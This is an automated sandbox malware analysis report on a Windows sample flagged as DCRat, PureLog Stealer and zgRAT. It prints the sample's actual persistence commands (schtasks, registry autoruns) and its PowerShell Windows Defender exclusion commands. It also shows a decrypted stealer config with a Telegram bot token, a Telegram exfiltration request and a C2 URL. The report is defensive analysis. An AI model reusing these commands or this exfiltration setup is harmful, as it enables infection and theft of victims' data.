Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Udzp7lL5ns.exe

Overview

General Information

Sample name:Udzp7lL5ns.exe
renamed because original name is a hash value
Original sample name:3614F4C4B137E627F03D0118F4779D52.exe
Analysis ID:1589185
MD5:3614f4c4b137e627f03d0118f4779d52
SHA1:07120124f394eddb46c3c2a985063718d17fc48d
SHA256:4acc21ce239f8eadca573c53b92cc49b96a9d7b96f7cfe4a5511847148839a2a
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Udzp7lL5ns.exe (PID: 348 cmdline: "C:\Users\user\Desktop\Udzp7lL5ns.exe" MD5: 3614F4C4B137E627F03D0118F4779D52)
    • csc.exe (PID: 5516 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 5908 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED84.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2936DBF6B4C2EB0AEC72C42A91573.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 6404 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEF49.tmp" "c:\Windows\System32\CSC98778A6FB9344578AD1F444CFDF09EF9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 4536 cmdline: schtasks.exe /create /tn "LaHYItspByFGQiJUMBgDGadpL" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6696 cmdline: schtasks.exe /create /tn "Udzp7lL5nsU" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3920 cmdline: schtasks.exe /create /tn "Udzp7lL5ns" /sc ONLOGON /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 4536 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6696 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3920 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7200 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8004 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7228 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7256 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Udzp7lL5ns.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7572 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grqPBzywzR.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7776 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7848 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • Memory Compression.exe (PID: 5436 cmdline: "C:\Program Files (x86)\windows mail\Memory Compression.exe" MD5: 3614F4C4B137E627F03D0118F4779D52)
  • ApplicationFrameHost.exe (PID: 4144 cmdline: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe MD5: 3614F4C4B137E627F03D0118F4779D52)
  • ApplicationFrameHost.exe (PID: 3192 cmdline: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe MD5: 3614F4C4B137E627F03D0118F4779D52)
  • Memory Compression.exe (PID: 3620 cmdline: "C:\Program Files (x86)\windows mail\Memory Compression.exe" MD5: 3614F4C4B137E627F03D0118F4779D52)
  • Memory Compression.exe (PID: 4160 cmdline: "C:\Program Files (x86)\windows mail\Memory Compression.exe" MD5: 3614F4C4B137E627F03D0118F4779D52)
  • Udzp7lL5ns.exe (PID: 7900 cmdline: C:\Users\user\Desktop\Udzp7lL5ns.exe MD5: 3614F4C4B137E627F03D0118F4779D52)
  • Udzp7lL5ns.exe (PID: 7932 cmdline: C:\Users\user\Desktop\Udzp7lL5ns.exe MD5: 3614F4C4B137E627F03D0118F4779D52)
  • Memory Compression.exe (PID: 8040 cmdline: "C:\Program Files (x86)\windows mail\Memory Compression.exe" MD5: 3614F4C4B137E627F03D0118F4779D52)
  • svchost.exe (PID: 4052 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ApplicationFrameHost.exe (PID: 7056 cmdline: "C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe" MD5: 3614F4C4B137E627F03D0118F4779D52)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Udzp7lL5ns.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    Udzp7lL5ns.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Windows Mail\Memory Compression.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 3 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000002.2152938013.0000000012956000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.2053026799.00000000002B2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Process Memory Space: Udzp7lL5ns.exe PID: 348JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: Memory Compression.exe PID: 8040JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.Udzp7lL5ns.exe.2b0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.Udzp7lL5ns.exe.2b0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 6404, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Udzp7lL5ns.exe", ParentImage: C:\Users\user\Desktop\Udzp7lL5ns.exe, ParentProcessId: 348, ParentProcessName: Udzp7lL5ns.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe', ProcessId: 4536, ProcessName: powershell.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\windows mail\Memory Compression.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Udzp7lL5ns.exe, ProcessId: 348, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Memory Compression
                            Sigma detected: CurrentVersion NT Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\windows mail\Memory Compression.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Udzp7lL5ns.exe, ProcessId: 348, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\Udzp7lL5ns.exe", ParentImage: C:\Users\user\Desktop\Udzp7lL5ns.exe, ParentProcessId: 348, ParentProcessName: Udzp7lL5ns.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline", ProcessId: 5516, ProcessName: csc.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Udzp7lL5ns.exe", ParentImage: C:\Users\user\Desktop\Udzp7lL5ns.exe, ParentProcessId: 348, ParentProcessName: Udzp7lL5ns.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe', ProcessId: 4536, ProcessName: powershell.exe
                            Sigma detected: Dynamic CSharp Compile Artefact
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Udzp7lL5ns.exe, ProcessId: 348, TargetFilename: C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Udzp7lL5ns.exe", ParentImage: C:\Users\user\Desktop\Udzp7lL5ns.exe, ParentProcessId: 348, ParentProcessName: Udzp7lL5ns.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe', ProcessId: 4536, ProcessName: powershell.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4052, ProcessName: svchost.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Dot net compiler compiles file from suspicious location
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\Udzp7lL5ns.exe", ParentImage: C:\Users\user\Desktop\Udzp7lL5ns.exe, ParentProcessId: 348, ParentProcessName: Udzp7lL5ns.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline", ProcessId: 5516, ProcessName: csc.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-11T15:02:22.189215+010020480951A Network Trojan was detected192.168.2.549729104.21.38.8480TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-11T15:03:04.474148+010028033053Unknown Traffic192.168.2.54995534.117.59.81443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-11T15:03:05.486999+010018100091Potentially Bad Traffic192.168.2.549963149.154.167.220443TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: Udzp7lL5ns.exeAvira: detected
                            Antivirus detection for URL or domain
                            Source: http://586580cm.renyash.ru/eternallowProcessDefaultLinuxWindowsflowerTrackTemp.phpAvira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\Desktop\BQKoNvFu.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                            Source: C:\Users\user\Desktop\EnQNlhbf.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                            Source: C:\Users\user\AppData\Local\Temp\grqPBzywzR.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeReversingLabs: Detection: 65%
                            Source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exeReversingLabs: Detection: 65%
                            Source: C:\Users\user\Desktop\BQKoNvFu.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\EnQNlhbf.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\MvRfNUhf.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\XMmLkVMA.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\cflUKPKy.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\wJHXBnLy.logReversingLabs: Detection: 50%
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeReversingLabs: Detection: 65%
                            Source: C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exeReversingLabs: Detection: 65%
                            Multi AV Scanner detection for submitted file
                            Source: Udzp7lL5ns.exeVirustotal: Detection: 68%Perma Link
                            Source: Udzp7lL5ns.exeReversingLabs: Detection: 65%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\Desktop\HJnNqbKj.logJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\DHvXeCGn.logJoe Sandbox ML: detected
                            Source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\BQKoNvFu.logJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\EnQNlhbf.logJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: Udzp7lL5ns.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 00000000.00000002.2152938013.0000000012956000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6633994546","bottoken":"8039401524:AAFcWGDQGg-hS6lbQGiVB_qWg821-l6LJqk","settings":"USER\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"False","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}\nLog size: {SIZE}"}}
                            Source: 00000000.00000002.2152938013.0000000012956000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-hpwtvZpgP5Ms2jfyINnC","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                            Source: Udzp7lL5ns.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49947 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49963 version: TLS 1.2
                            Source: Udzp7lL5ns.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.pdb source: Udzp7lL5ns.exe, 00000000.00000002.2117240064.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.pdb source: Udzp7lL5ns.exe, 00000000.00000002.2117240064.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49729 -> 104.21.38.84:80
                            Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.5:49963 -> 149.154.167.220:443
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: global trafficHTTP traffic detected: POST /bot8039401524:AAFcWGDQGg-hS6lbQGiVB_qWg821-l6LJqk/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="46d320d3-5b85-4524-9efd-7dcb6d562ef6"Host: api.telegram.orgContent-Length: 104711Expect: 100-continueConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewIP Address: 104.21.38.84 104.21.38.84
                            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
